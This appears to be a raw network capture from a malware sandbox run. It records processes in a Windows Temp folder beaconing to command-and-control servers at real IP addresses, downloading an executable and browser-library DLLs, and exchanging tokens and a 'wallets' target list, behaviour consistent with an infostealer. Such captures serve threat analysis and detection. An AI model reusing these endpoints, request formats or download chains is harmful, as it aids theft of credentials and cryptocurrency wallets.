Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	50048	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:48.256365061 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:54:49.615981102 CET	293	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 37 0d 0a 20 3c 63 3e 31 30 31 34 38 38 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 67 <c>1014886001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	50049	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:49.778770924 CET	142	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMT If-None-Match: "67594bc0-b1a00"
Dec 13, 2024 18:54:51.116283894 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:50 GMT Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	50057	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:54.653677940 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014886001&unit=246122658369
Dec 13, 2024 18:54:55.562297106 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	50059	185.215.113.206	80	6008	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:55.107466936 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="file"------IIJEBAECGCBKECAAAEBF--
Dec 13, 2024 18:54:56.936536074 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 13, 2024 18:54:58.942059040 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:54:59.411883116 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 13, 2024 18:54:59.411922932 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}U
Dec 13, 2024 18:54:59.413127899 CET	1236	IN	Data Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
Dec 13, 2024 18:54:59.413269043 CET	1236	IN	Data Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1 Data Ascii: T$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$
Dec 13, 2024 18:54:59.413281918 CET	248	IN	Data Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45 Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7
Dec 13, 2024 18:54:59.415055037 CET	1236	IN	Data Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 Data Ascii: !)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
Dec 13, 2024 18:54:59.415179968 CET	1236	IN	Data Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
Dec 13, 2024 18:54:59.415194035 CET	248	IN	Data Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
Dec 13, 2024 18:54:59.417136908 CET	1236	IN	Data Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
Dec 13, 2024 18:54:59.417232037 CET	1236	IN	Data Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
Dec 13, 2024 18:54:59.423412085 CET	248	IN	Data Raw: 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 02 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 07 8b 45 f0 88 14 30 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 Data Ascii: MEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}E
Dec 13, 2024 18:55:01.257585049 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:55:01.695647955 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:01 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 13, 2024 18:55:02.803930998 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:55:03.242436886 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 13, 2024 18:55:04.024254084 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:55:04.463509083 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 13, 2024 18:55:07.656341076 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:55:08.095562935 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:07 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 13, 2024 18:55:09.270217896 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:55:09.709903002 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:09 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 13, 2024 18:55:10.949935913 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:55:12.069869041 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 13, 2024 18:55:13.489594936 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 2d 2d 0d 0a Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="message"wallets------AFIEGIECGCBKFIEBGCAA--
Dec 13, 2024 18:55:13.943519115 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 